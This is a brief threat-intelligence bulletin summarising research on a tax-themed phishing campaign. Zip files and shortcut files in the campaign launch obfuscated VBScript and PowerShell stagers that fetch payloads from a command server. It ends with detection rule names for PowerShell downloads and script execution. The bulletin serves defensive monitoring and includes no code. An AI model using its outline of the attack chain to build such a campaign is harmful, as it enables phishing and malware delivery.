"Tactical Octopus" Cybercriminals Use Tax-themed Phishing for Malware Distribution
Category: Threat Actor Activity | Industry: Global | Level: Tactical | Source: Securonix
A group of hackers known as "TACTICAL#OCTOPUS" is using phishing scams related to taxes to distribute malware, according to researchers from Securonix Threat Labs. Activity displayed from the group in the past several months, found the hackers using employee tax documents such as W-2s, I-9s, and real estate purchase contracts to encourage people to download malware. The attack chain encompasses a compressed zip file, a shortcut file triggering multiple VBScript and PowerShell stagers to retrieve additional payloads from the C2 server. This malware then grants the hackers broad access to their devices. The researchers identified two IP addresses associated with the attack as belonging to Petersburg Internet Network Ltd. in Russia, while the third was linked to Des Capital B.V., a US-based company. "Two of three IP addresses identified in the attack were registered to Petersburg Internet Network Ltd. in the Russian Federation. This could indicate Russian origins; however, the possibility of false flag operations cannot be ruled out at this point," as assessed by Securonix. Based on the recent samples analyzed by Securonix, the campaign is deemed active. Despite the threat actors utilizing a common initial access technique with shortcut files, the use of sophisticated PowerShell and VBScript code, specifically designed to avoid antivirus detection and obfuscation, sets this campaign apart and highlights the importance of continued monitoring.
- Suspicious Payload Initiated from PowerShell
Anvilogic Use Cases:
- Invoke-WebRequest Command
- Wscript/Cscript Execution
- Network Connection with Suspicious Folder